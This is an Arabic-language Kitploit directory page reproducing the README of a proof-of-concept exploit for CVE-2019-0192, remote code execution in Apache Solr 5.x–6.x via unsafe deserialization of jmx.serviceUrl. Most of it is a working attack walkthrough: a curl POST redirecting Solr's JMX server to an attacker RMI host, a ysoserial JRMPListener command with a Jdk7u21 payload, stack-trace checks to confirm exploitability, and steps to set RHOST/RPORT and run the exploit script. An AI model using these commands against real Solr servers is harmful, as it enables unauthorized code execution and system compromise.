Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-0192 — RCE على Apache Solr باستخدام إلغاء تسلسل البيانات غير الموثوقة عبر jmx.serviceUrl | Kitploit
أدوات/GitHubGitHub/mpgn/cve-2019-0192
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubmpgn/cve-2019-0192

CVE-2019-0192

RCE على Apache Solr باستخدام إلغاء تسلسل البيانات غير الموثوقة عبر jmx.serviceUrl

عرض المستودع
208553منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-0192 - Apache Solr RCE من 5.0.0 إلى 5.5.5 ومن 6.0.0 إلى 6.6.5

هذا هو Proof of Concept مبكر لثغرة Apache Solr RCE

من https://issues.apache.org/jira/browse/SOLR-13301:

تتيح ConfigAPI إمكانية تكوين خادم JMX الخاص بـ Solr عبر طلب HTTP POST. من خلال توجيهه إلى خادم RMI خبيث، يمكن للمهاجم استغلال إلغاء التسلسل غير الآمن في Solr لتنفيذ تنفيذ تعليمات برمجية عن بُعد على جانب Solr.

إثبات المفهوم

image


من خلال الاطلاع على وصف النشرة الأمنية وفحص ConfigAPI موارد Apache Solr، يمكننا العثور على مرجع لخادم JMX:

image

serviceUrl - (str اختياري) عنوان URL لخدمة خادم JMX. إذا لم يتم تحديده، سيتم استخدام خادم MBean الافتراضي للنظام الأساسي.

من خلال فحص كيفية عمل ConfigAPI يمكننا إعادة إنتاج طريقة إعداد خادم JMX عن بُعد:

root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

بالنسبة إلى إثبات المفهوم، سأستخدم yoserial لإنشاء خادم RMI خبيث باستخدام الحمولة Jdk7u21

  1. شغّل خادم RMI الخبيث:
root@kitploit:~
java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/pwn.txt"
  1. نفّذ طلب POST:
root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

ملاحظة: يجب أن تحصل على خطأ 500 مع stacktrace مفصلة.

  1. تحقق من stacktrace:
  • إذا رأيت هذا الخطأ: "Non-annotation type in annotation serial stream" فهذا يعني أن Apache Solr يعمل بإصدار جافا أحدث من JRE 7u25 وأن إثبات المفهوم هذا لن يعمل.

  • بخلاف ذلك، يجب أن ترى هذا الخطأ: "undeclared checked exception; nested exception is" وعندها يجب أن يعمل إثبات المفهوم.

الاستغلال

  1. حمّل yoserial من: https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
  2. غيّر القيم في البرنامج النصي:
root@kitploit:~
remote = "http://172.18.0.5:8983"
ressource = ""
RHOST = "172.18.0.1"
RPORT = "1099"
  1. ثم نفّذ البرنامج النصي:
root@kitploit:~
python3 CVE-2019-0192.py

النشرة الأمنية:

  • http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E

الموارد:

  • https://lucene.apache.org/solr/guide/6_6/config-api.html#ConfigAPI-CommandsforCommonProperties
  • https://issues.apache.org/jira/browse/SOLR-13301
تنزيل الأداة